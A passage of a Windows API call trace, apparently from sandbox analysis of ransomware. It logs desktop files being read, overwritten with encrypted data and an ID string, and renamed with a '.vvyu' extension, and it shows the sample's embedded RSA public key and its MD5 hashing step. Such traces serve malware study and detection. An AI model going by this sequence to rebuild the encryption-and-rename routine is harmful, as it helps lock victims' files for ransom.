RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d808 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d778 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7c0 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d838 [0187.940] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.940] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7f0 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d850 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d898 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7f0 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d808 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af23b8 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af25c8 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0187.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d808 | out: hHeap=0x2c0000) returned 1 [0187.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af27e0 [0187.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0187.942] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0187.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0187.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0187.943] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0187.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0187.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0187.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0187.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af25c8 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af27e0 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7c0 | out: hHeap=0x2c0000) returned 1 [0187.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0187.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0187.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0187.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d7a8 | out: hHeap=0x2c0000) returned 1 [0187.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae21d0 | out: hHeap=0x2c0000) returned 1 [0187.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af23b8 | out: hHeap=0x2c0000) returned 1 [0187.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0187.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0187.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0187.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0187.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0187.948] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0187.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0187.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0187.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0187.950] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0187.950] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0xe50b, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0xe50b, lpOverlapped=0x0) returned 1 [0187.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.951] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xe510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.952] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0187.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0187.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0187.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0187.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0187.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0187.953] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0187.954] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0187.954] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.954] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0187.954] CloseHandle (hObject=0x584) returned 1 [0187.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbbc0 [0187.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2ae3ea0 [0187.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbbc0 | out: hHeap=0x2c0000) returned 1 [0187.956] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\0W8tqjZS69QqxVZS-D8D.ods" (normalized: "c:\\users\\keecfmwgj\\desktop\\0w8tqjzs69qqxvzs-d8d.ods"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\0W8tqjZS69QqxVZS-D8D.ods.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\0w8tqjzs69qqxvzs-d8d.ods.vvyu")) returned 1 [0187.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0187.960] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.960] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0187.964] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff454b20, ftCreationTime.dwHighDateTime=0x1d89e3b, ftLastAccessTime.dwLowDateTime=0xc237f070, ftLastAccessTime.dwHighDateTime=0x1d89e5e, ftLastWriteTime.dwLowDateTime=0xc237f070, ftLastWriteTime.dwHighDateTime=0x1d89e5e, nFileSizeHigh=0x0, nFileSizeLow=0x2543, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2CgRhD9i_8EFMrM.png", cAlternateFileName="2CGRHD~1.PNG")) returned 1 [0187.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae21d0 [0187.964] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0187.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae21d0 | out: hHeap=0x2c0000) returned 1 [0187.964] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\2CgRhD9i_8EFMrM.png") returned=".png" [0187.964] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\2CgRhD9i_8EFMrM.png" (normalized: "c:\\users\\keecfmwgj\\desktop\\2cgrhd9i_8efmrm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0187.965] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=9539) returned 1 [0187.965] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0187.967] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x251d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.967] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0187.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.969] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0187.969] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x2543, lpOverlapped=0x0) returned 1 [0187.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.969] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0187.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.969] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0187.969] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0187.970] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0187.970] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0187.970] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0187.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0187.970] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0187.970] GetLastError () returned 0x0 [0187.970] SetLastError (dwErrCode=0x0) [0187.970] GetLastError () returned 0x0 [0187.970] SetLastError (dwErrCode=0x0) [0187.970] GetLastError () returned 0x0 [0187.970] SetLastError (dwErrCode=0x0) [0187.970] GetLastError () returned 0x0 [0187.970] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0187.971] GetLastError () returned 0x0 [0187.971] SetLastError (dwErrCode=0x0) [0187.971] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] GetLastError () returned 0x0 [0187.972] SetLastError (dwErrCode=0x0) [0187.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0187.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0187.973] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0187.973] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0187.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0187.973] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0187.973] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0187.973] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0187.973] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0187.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2540) returned 0x2ae3ea0 [0187.974] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0187.974] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae21d0 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7a8 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2188 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d7c0 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d778 [0187.974] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0187.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d898 [0187.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0187.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0187.975] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae63e8 [0187.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae6608 [0187.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d778 | out: hHeap=0x2c0000) returned 1 [0187.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d898 | out: hHeap=0x2c0000) returned 1 [0187.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0187.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0187.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6608 | out: hHeap=0x2c0000) returned 1 [0187.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0187.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0187.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d898 [0187.977] RtlAllocateHeap 